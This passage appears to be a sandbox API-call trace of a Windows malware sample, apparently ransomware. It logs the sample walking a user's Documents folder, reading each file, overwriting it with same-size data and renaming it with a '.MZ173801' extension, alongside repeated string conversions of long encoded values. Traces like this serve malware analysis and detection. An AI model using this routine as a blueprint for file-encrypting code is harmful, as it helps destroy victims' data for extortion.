5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.253] GetCurrentThreadId () returned 0x1358 [0121.253] GetCurrentThreadId () returned 0x1358 [0121.253] GetCurrentThreadId () returned 0x1358 [0121.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.255] GetCurrentThreadId () returned 0x1358 [0121.255] GetCurrentThreadId () returned 0x1358 [0121.255] GetCurrentThreadId () returned 0x1358 [0121.256] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\a TQSWLwdnXwLBG6xlM.pps" (normalized: "c:\\users\\fd1hvy\\documents\\a tqswlwdnxwlbg6xlm.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.256] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.256] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.256] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x9515 [0121.256] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.256] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x9515, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x9515, lpOverlapped=0x0) returned 1 [0121.258] CloseHandle (hObject=0x3fc) returned 1 [0121.259] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\a TQSWLwdnXwLBG6xlM.pps" (normalized: "c:\\users\\fd1hvy\\documents\\a tqswlwdnxwlbg6xlm.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.261] WriteFile (in: hFile=0x3fc, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x9515, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f9bc*=0x9515, lpOverlapped=0x0) returned 1 [0121.263] CloseHandle (hObject=0x3fc) returned 1 [0121.266] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\a TQSWLwdnXwLBG6xlM.pps" (normalized: "c:\\users\\fd1hvy\\documents\\a tqswlwdnxwlbg6xlm.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\a TQSWLwdnXwLBG6xlM.pps.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\a tqswlwdnxwlbg6xlm.pps.mz173801")) returned 1 [0121.267] GetCurrentThreadId () returned 0x1358 [0121.267] GetCurrentThreadId () returned 0x1358 [0121.267] GetCurrentThreadId () returned 0x1358 [0121.267] GetCurrentThreadId () returned 0x1358 [0121.267] GetCurrentThreadId () returned 0x1358 [0121.267] GetCurrentThreadId () returned 0x1358 [0121.267] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735d4ec0, ftCreationTime.dwHighDateTime=0x1d5a7e2, ftLastAccessTime.dwLowDateTime=0xdc7b03e0, ftLastAccessTime.dwHighDateTime=0x1d5722a, ftLastWriteTime.dwLowDateTime=0xdc7b03e0, ftLastWriteTime.dwHighDateTime=0x1d5722a, nFileSizeHigh=0x0, nFileSizeLow=0x278f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="bJ9_Ah.pptx", cAlternateFileName="BJ9_AH~1.PPT")) returned 1 [0121.267] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.267] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.267] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bJ9_Ah.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bj9_ah.pptx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735d4ec0, ftCreationTime.dwHighDateTime=0x1d5a7e2, ftLastAccessTime.dwLowDateTime=0xdc7b03e0, ftLastAccessTime.dwHighDateTime=0x1d5722a, ftLastWriteTime.dwLowDateTime=0xdc7b03e0, ftLastWriteTime.dwHighDateTime=0x1d5722a, nFileSizeHigh=0x0, nFileSizeLow=0x278f)) returned 1 [0121.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.268] GetCurrentThreadId () returned 0x1358 [0121.268] GetCurrentThreadId () returned 0x1358 [0121.268] GetCurrentThreadId () returned 0x1358 [0121.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.269] GetCurrentThreadId () returned 0x1358 [0121.269] GetCurrentThreadId () returned 0x1358 [0121.269] GetCurrentThreadId () returned 0x1358 [0121.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bJ9_Ah.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bj9_ah.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.269] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.269] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.269] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x278f [0121.269] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.269] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x278f, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x278f, lpOverlapped=0x0) returned 1 [0121.270] CloseHandle (hObject=0x3fc) returned 1 [0121.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bJ9_Ah.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bj9_ah.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.271] WriteFile (in: hFile=0x3fc, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x278f, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f9bc*=0x278f, lpOverlapped=0x0) returned 1 [0121.272] CloseHandle (hObject=0x3fc) returned 1 [0121.273] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bJ9_Ah.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bj9_ah.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bJ9_Ah.pptx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\bj9_ah.pptx.mz173801")) returned 1 [0121.287] GetCurrentThreadId () returned 0x1358 [0121.287] GetCurrentThreadId () returned 0x1358 [0121.287] GetCurrentThreadId () returned 0x1358 [0121.287] GetCurrentThreadId () returned 0x1358 [0121.287] GetCurrentThreadId () returned 0x1358 [0121.287] GetCurrentThreadId () returned 0x1358 [0121.287] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 1 [0121.287] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.287] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.287] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000)) returned 1 [0121.288] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 